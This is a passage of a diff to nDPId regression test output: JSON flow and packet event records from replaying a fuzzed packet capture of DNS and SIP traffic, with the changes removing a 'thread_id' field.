{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470398968,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOazwAJXMASxHAqAECwKgB\/wD+AIkAOltshS8BFAABAAAAAAAAIEVGRURFSkZQRUVFUEVOJXMASkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470398968,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOazwAJXMASxHAqAECwKgB\/wD+AIkAOltshS8BFAABAAAAAAAAIEVGRURFSkZQRUVFUEVOJXMASkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470399719} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470399719}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1120470402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470402624,"pkt":"ADBUADRWAODtAW69CABFAABEaz0AAIARTBjAqCECwKgBAQreADUAMNT8T+QAAAABAAAAAAAAQTEBMAEwAzEyNwdpbi1hZGQgBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1120470402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470402624,"pkt":"ADBUADRWAODtAW69CABFAABEaz0AAIARTBjAqCECwKgBAQreADUAMNT8T+QAAAABAAAAAAAAQTEBMAEwAzEyNwdpbi1hZGQgBGFycGEAAAwAAQ=="}
00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -737,15 +737,15 @@
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1120470402627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470402627,"pkt":"ADBUADRWAODtAW69CABFAAAhaz4AAIARF87AqAEG1PIhIxPEE8QADcBLICAgICA="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1120470402627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"thread_ts_msec":1120470402627,"pkt":"ADBUADRWAODtAW69CABFAAAhaz4AAIARF87AqAEG1PIhIxPEE8QADcBLICAgICA="}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2566,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1120470402627,"pkt":"AODtAW5nADBUADRWCgYAAQgABgQAAQAwVAA0VsCoAQEAAAAAAADAqAECiGQRAPY3AArAIQkOAAjPO\/nN"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2566,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1120470402627,"pkt":"AODtAW5nADBUADRWCgYAAQgABgQAAQAwVAA0VsCoAQEAAAAAAADAqAECiGQRAPY3AArAIQkOAAjPO\/nN"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2566,"global_ts_msec":1120470407625} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2566,"global_ts_msec":1120470407625}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1120470414647,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470414647,"pkt":"ADBUADRWAODtAW69CABFAABIa0oAAIARTAfAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAQhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1120470414647,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470414647,"pkt":"ADBUADRWAODtAW69CABFAABIa0oAAIARTAfAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAQhAAE="}
00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1120470415643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470415643,"pkt":"ADBUJXMAAODtAW69CABFAABIa0sAAIARTAbAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1120470415643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470415643,"pkt":"ADBUJXMAAODtAW69CABFAABIa0sAAIARTAbAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470415643,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470415643,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470417645} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470417645}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1120470419648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470419648,"pkt":"ADBUADRWAODtAW69CABFAABIa00AAIARJXMAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1120470419648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470419648,"pkt":"ADBUADRWAODtAW69CABFAABIa00AAIARJXMAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -761,10 +761,10 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1120470431657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470431657,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgFAgA1CuAAR2l1neWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFzcGEAAAwAAcAMAAwAAQAAJyVzAAlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1120470431657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470431657,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgFAgA1CuAAR2l1neWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFzcGEAAAwAAcAMAAwAAQAAJyVzAAlsb2NhbGhvc3QA"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 